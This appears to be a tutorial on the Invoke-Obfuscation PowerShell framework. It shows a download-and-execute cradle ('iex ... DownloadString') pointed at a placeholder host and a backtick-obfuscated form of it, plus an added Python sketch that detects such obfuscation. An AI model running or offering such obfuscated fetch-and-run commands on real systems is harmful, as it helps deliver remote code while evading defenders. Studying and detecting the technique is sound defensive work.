PowerShell Obfuscation Techniques & How to Detect Them

By: Jinx

April 26, 2017

Introduction:
Invoke-Obfuscation is a code-obfuscation framework built on PowerShell by Daniel Bohannon. Attackers are using more and more powerful techniques to obfuscate their scripts and code. PowerShell scripts are one such avenue of attack, and a very dangerous one, for a few reasons:
  • Most of the internet population is on Windows.
  • It can be executed in a number of different ways.
  • PowerShell can be used in every part of the attack cycle.
There are numerous ways to execute PowerShell scripts. They can be run from files (.ps1, .vbs, .bat), from Microsoft Word, from Microsoft Excel, or even remotely!

Installation:
In order to install the Invoke-Obfuscation tool, download the Git repository to a folder, fire up PowerShell, and type in:

    Import-Module ./Invoke-Obfuscation.psd1
    Invoke-Obfuscation

If an error about the Execution Policy shows up on your PC, just type in this:

    Set-ExecutionPolicy -Scope CurrentUser Unrestricted

This lets you execute your downloaded scripts. Once this screen appears, it is time to HAVE FUN!

THIS:

    iex (New-Object Net.WebClient).DownloadString("https://%s:%s/%s")

This command to download something can be converted to this:

    ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://'))) ….

All you have to do is:

    SET variable <command>

Once set, just type in encode and select the options from above. You can generate a token by using the token command, etc. Keep exploring the possibilities!
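As an added example (not part of the original article and not code from Invoke-Obfuscation), the Python sketch below shows one way to detect the tick and string-concatenation obfuscation shown above: it counts no-op backticks, strips them, joins split string literals, and reports the keywords that only become visible after that normalization. The function names, keyword list and threshold are assumptions made for the illustration; the two sample commands are the ones from this article.

```python
import re

# Assumption: Windows PowerShell 5.1 escape codes are `0 `a `b `f `n `r `t `v.
# A backtick before any other character is dropped by the parser, so inside a
# command or member name it is noise added only to break string matching.
NOOP_TICK = re.compile(r"`(?![0abfnrtv\r\n])")
# Closing quote, '+', opening quote of the same kind, e.g. 'ht'+'tps://'
CONCAT = re.compile(r"(['\"])\s*\+\s*\1")
# Keywords taken from the download cradle shown in the article.
KEYWORDS = ("iex", "net.webclient", "downloadstring", "newscriptblock")

# The two commands from the article (elided tail of the second one left out).
PLAIN = 'iex (New-Object Net.WebClient).DownloadString("https://%s:%s/%s")'
OBFUSCATED = r"""((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://')))"""


def keywords_in(text):
    """Return the keywords present as whole words, case-insensitively."""
    low = text.lower()
    return {k for k in KEYWORDS
            if re.search(r"(?<![a-z])" + re.escape(k) + r"(?![a-z])", low)}


def analyze(command, tick_threshold=3):
    """Score one command line for tick and concatenation obfuscation."""
    ticks = len(NOOP_TICK.findall(command))
    concats = len(CONCAT.findall(command))
    # Undo both tricks so ordinary keyword rules can see the real names.
    normalized = CONCAT.sub("", NOOP_TICK.sub("", command))
    visible = keywords_in(command)
    hidden = keywords_in(normalized) - visible
    return {
        "ticks": ticks,
        "concats": concats,
        "normalized": normalized,
        "visible": sorted(visible),
        "hidden": sorted(hidden),  # only detectable after normalization
        "obfuscated": ticks >= tick_threshold or bool(hidden),
    }


if __name__ == "__main__":
    for name, cmd in (("plain", PLAIN), ("obfuscated", OBFUSCATED)):
        r = analyze(cmd)
        print(name, r["ticks"], r["concats"], r["visible"], r["hidden"], r["obfuscated"])
```

In practice the input would be the command text recorded by PowerShell logging; a plain keyword rule sees nothing in the obfuscated form, while the tick count and the "hidden" list both flag it.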